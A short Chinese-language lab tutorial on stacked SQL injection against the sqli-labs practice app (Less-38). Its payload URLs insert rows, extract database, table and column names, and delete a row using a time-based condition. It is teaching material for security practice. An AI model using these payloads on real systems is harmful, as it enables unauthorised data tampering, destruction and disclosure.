一、堆叠注入介绍
1、多条sql语句同时执行
2、union只能执行查询语句,堆叠可以执行增删改查
3、同时执行三条语句
select 1;select 2;select 3;
二、插入注入
1、找到注入点,添加一条数据
http://192.168.139.129/sqli/Less-38/?id=1';insert into users(id,username,password) values(66,'aiyou','bucuo') --+
再次访问http://192.168.139.129/sqli/Less-38/?id=66
2、获取数据库名称
http://192.168.139.129/sqli/Less-38/?id=1';insert into users(id,username,password) values(67,database(),'bucuo') --+
再次访问http://192.168.139.129/sqli/Less-38/?id=67获取数据库名称
3、获取数据库中的表名
http://192.168.139.129/sqli/Less-38/?id=1';insert into users(id,username,password) values(71,(select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 2,1) ,(select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 3,1)) --+
再次访问http://192.168.139.129/sqli/Less-38/?id=71获取表名信息
4、获取表中的字段名
http://192.168.139.129/sqli/Less-38/?id=1';insert into users(id,username,password) values(74,(select column_name from information_schema.columns where table_name="users" limit 13,1) ,(select column_name from information_schema.columns where table_name="users" limit 12,1)) --+
再次访问http://192.168.139.129/sqli/Less-38/?id=74获取字段信息
三、删除删除注入
http://192.168.139.129/sqli/Less-38/?id=1';delete from users where id=74 and sleep(if((select database())=0x7365637572697479,5,0));
禁止非法,后果自负